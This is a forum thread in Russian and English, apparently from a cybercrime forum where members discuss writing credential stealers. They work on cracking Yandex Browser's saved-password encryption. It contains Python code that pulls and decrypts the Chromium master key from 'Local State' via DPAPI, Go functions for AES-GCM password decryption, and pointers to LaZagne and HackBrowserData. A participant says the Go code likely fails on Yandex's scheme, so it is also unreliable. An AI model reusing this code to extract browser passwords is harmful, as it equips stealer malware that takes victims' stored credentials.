Для себя в первую очередь. Очень интересно как это устроено. Пока иду по хлебным крошкам в поисках алгоритма. Если кому то интересно, то прошу в тему. Если кто то коммерчески мотивирован, то может всегда об этом заявить - проблем не будет. А вот если переписывали свои стиллеры с гитхаба, используя чужие наработки или исследования - то пора уже что то вкинуть в сообщество.
ЛЮБОПЫТСТВО
Только любопытство. Я вообще по другой теме. У меня всегда спрашивали - какое твое хобби. И у меня всегда не было ответа. Всегда мучался по этому поводу. Вот нашел себе занятие впервые, даже денег сам готов заплатить тем кто окажется очень умен и поможет в этом вопросе. Уж очень интересная вещь. По сути если приглядется ко мне и поскребсти - там ничего выдающегося и нет, а вот если оставлю свой след на форуме в виде типа который силы вложил в ЯБ. То нормас, хоть что то останется. А то все коммерция коммерция. А в чем смысл жизни, брат? В том что бы зарабатывать миллионы? А не было никогда миллионов брат, только жизнь начинается!! Давай будем сильными и ебучими-ебучими и ломанем яндекс бразуер, а то сафари слишком скушна, думаю людям интересно будет именно про яндекс почитать, вон видишь уже спорят работа по ру это или нет. А я так говорю, да я говорю - если вы умные, то помогите, я вам может быть и денег заплочу. Тут уже дело принципа, чисто джентельменская тема от меня.
тс молодец, тему прогреваешь. В будущем да и сейчас, каждый форумчанин сможет для себя что нибудь узнать.
Да и х#й с ним, главное процесс, а не это вот всё. Спасибо за добрые слова
LaZagne.exe windows
def get_master_key():
with open("Local State", "r", encoding="utf-8") as f:
c = f.read()
local_state = json.loads(c)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
hex_representation = key.hex()
ansi_representation = key.decode('latin-1')
length = len(key)
print(f"master_key (Hex): {hex_representation}")
print(f"master_key (ANSI): {ansi_representation}")
print(f"master_key Length: {length} bytes")
key = key[5:]
key = CryptUnprotectData(key, None, None, None, 0)[1]
hex_representation = key.hex()
ansi_representation = key.decode('latin-1')
length = len(key)
with open('binary_data_master_key.bin', 'wb') as file:
file.write(key)
print(f"master_key (Hex): {hex_representation}")
print(f"master_key (ANSI): {ansi_representation}")
print(f"master_key Length: {length} bytes")
return keyimport json
import win32crypt
import base64
import os
# Чтение файла Local State
local_state_file = 'Local State'
with open(local_state_file, 'r', encoding='utf-8') as f:
local_state_data = json.load(f)
# Чтение бинарных данных из файла binary_data.bin
binary_data_file = 'binary_data_master_key.bin'
with open(binary_data_file, 'rb') as f:
binary_data = f.read()
# Шифрование бинарных данных с использованием DPAPI
encrypted_binary_data = win32crypt.CryptProtectData(
binary_data,
None,
None,
None,
None,
0
)
# Преобразование шифрованных данных в base64
base64_encrypted_data = base64.b64encode(b'4450415049'+encrypted_binary_data).decode('utf-8')
# Замена значения в Local State
local_state_data['os_crypt']['encrypted_key'] = base64_encrypted_data
# Сохранение обновленных данных обратно в файл Local State
with open(local_state_file, 'w', encoding='utf-8') as f:
json.dump(local_state_data, f, ensure_ascii=False, indent=4)
print("Значение в Local State успешно обновлено.")далее всем форумом в тред локбита... Каждый свою копейку вставил, и то хорошо.
важен только этот тред...
i have algo
I also got it, and this one is free and open src
Have you test it on Yandex Browser? I don't see it actually working just by looking at this code (at very least there is no v10 prefix in yandex's encryption scheme):
func DecryptWithChromium(key, ciphertext []byte) ([]byte, error) {
if len(ciphertext) < minEncryptedDataSize {
return nil, ErrCiphertextLengthIsInvalid
}
nonce := ciphertext[3 : 3+nonceSize]
encryptedPassword := ciphertext[3+nonceSize:]
return AESGCMDecrypt(key, nonce, encryptedPassword)
}
// DecryptWithYandex decrypts the password with AES-GCM
func DecryptWithYandex(key, ciphertext []byte) ([]byte, error) {
if len(ciphertext) < minEncryptedDataSize {
return nil, ErrCiphertextLengthIsInvalid
}
// remove Prefix 'v10'
// gcmBlockSize = 16
// gcmTagSize = 16
// gcmMinimumTagSize = 12 // NIST SP 800-38D recommends tags with 12 or more bytes.
// gcmStandardNonceSize = 12
nonce := ciphertext[3 : 3+nonceSize]
encryptedPassword := ciphertext[3+nonceSize:]
return AESGCMDecrypt(key, nonce, encryptedPassword)
}yandex uses double aes gcm with some kdfI also got it, and this one is free and open src
This repo is supporting all browsers:
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux).
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserDatagithub.com
Example how to get Yandex PWs:
HackBrowserData/browserdata/password/password.go at main · moonD4rk/HackBrowserData
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserDatagithub.com
No, I was looking only at repo and description, it does not seems to be some shit rather coherent up to date github repo thus I assume it should work, there is also binary file, thus I'll test it
